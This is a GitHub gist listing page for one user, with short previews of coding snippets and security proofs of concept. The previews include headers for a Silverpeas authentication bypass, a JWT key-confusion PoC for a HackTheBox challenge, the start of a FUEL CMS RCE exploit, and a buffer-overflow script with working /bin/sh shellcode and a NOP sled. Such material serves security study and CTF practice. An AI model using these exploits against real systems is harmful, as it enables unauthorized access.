wulfgarpro / CVE-2024-36042.md

Created March 12, 2025 03:30 — forked from ChrisPritchard/CVE-2024-36042.md

Exploit Title: Silverpeas CRM - Authentication Bypass

Date of found: 12/05/2024

Exploit Author: Chris Pritchard [email protected]

Version: V1.0

Tested on: 6.3.4

Fixed in: 6.3.5

Vendor Homepage: https://silverpeas.org/

Software Link: https://silverpeas.org/

CVE: CVE-2024-36042

CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36042

wulfgarpro / pyodin.py

Created January 13, 2025 05:12

pyodin: Python wrapper for Samsung's Odin protocol

	#!/usr/bin/python

	# Copyright (C) 2015, Samsung Electronics, Co., Ltd. All Rights Reserved.
	# # Written by System S/W 2 Group, S/W Platform R&D Team,
	# # Mobile Communication Division.
	# ##
	#
	# ##
	# # Project Name : pyodin
	# #

wulfgarpro / getips.sh

Created September 11, 2024 01:47

getips

	#!/bin/bash

	if [ "$#" -ne 2 ]; then
	echo "Usage: $0 [N] [IPv4]"
	exit 1
	fi

	N=$1
	IP=$2

wulfgarpro / LowUtilities.cpp

Created November 22, 2023 02:32 — forked from D4stiny/LowUtilities.cpp

A dependency-less implementation of GetModuleHandle and GetProcAddress.

	//
	// An implementation of GetModuleHandle and GetProcAddress that works with manually mapped modules, forwarded exports,
	// without a CRT standard library, and uses no Windows API or dependencies.
	//
	// Author: Bill Demirkapi
	// License: MIT, appended at the bottom of this document if you care about licensing and want to credit me in your own project.
	//

	#include <Windows.h>
	#include <winternl.h>

wulfgarpro / error_iterator.rs

Last active January 11, 2023 08:21

Stop iterator when error is encountered, and report.

	use anyhow::{anyhow, Result};

	fn main() -> Result<()> {
	let v = vec![false, true, true];

	let res = v.iter().map(\|x\| {
	println!("looped"); // Loops only two times, not 3.
	if *x {
	Err(anyhow!("error"))
	} else {

wulfgarpro / ignore_override.rs

Created January 9, 2023 22:41

Build a matcher for a set of glob overrides using the `ignore` crate.

	use ignore::WalkBuilder;
	use ignore::overrides::OverrideBuilder;

	fn main() {
	let folder = "/tmp/files";
	let mut override_builder = OverrideBuilder::new(folder);
	override_builder.add("!test.txt").unwrap();
	override_builder.add("!test.rs").unwrap();
	let or = override_builder.build().unwrap();

wulfgarpro / cli_cpp.cpp

Created July 16, 2022 09:44

Basic cli interface for cpp

	#include <iostream>

	void help() {
	std::cout << "Help" << std::endl;
	}

	void option1(std::string arg) {
	std::cout << "option1: " << arg << std::endl;
	}

wulfgarpro / jwt_forge.py

Last active January 4, 2024 17:24

HTB "Under Construction" CVE-2015-9235 PoC

	"""
	CVE-2015-9235 PoC, known as
	"JWT HS/RSA key confusion vulnerability".

	This PoC was used to solve the HTB challenge
	"Under Construction" on HackTheBox (HTB).

	USAGE:
	==
	Token was obtained by logging into the

wulfgarpro / fuelpwn.py

Created September 29, 2020 08:30

FUEL CMS v1.4.1 CVE-2018-16763 PoC

	"""
	FUEL CMS v1.4.1 CVE-2018-16763 PoC.

	This PoC was derived from: https://www.exploit-db.com/exploits/47138.
	"""
	import argparse
	import urllib
	import requests

	parser = argparse.ArgumentParser('Fuel CMS v1.4 CVE-2018-16763 PoC')

wulfgarpro / exploit.py

Created January 3, 2019 00:52

Basic shell

	BUF_SIZE=112
	shellcode = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f"
	shellcode += "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd"
	shellcode += "\x80"

	NOP_SLED = "\x90" * (BUF_SIZE - len(shellcode))
	#0xffffd49c
	#0xffffd4ac
	#0xffffd440
	#0xffffd43c

James Fraser wulfgarpro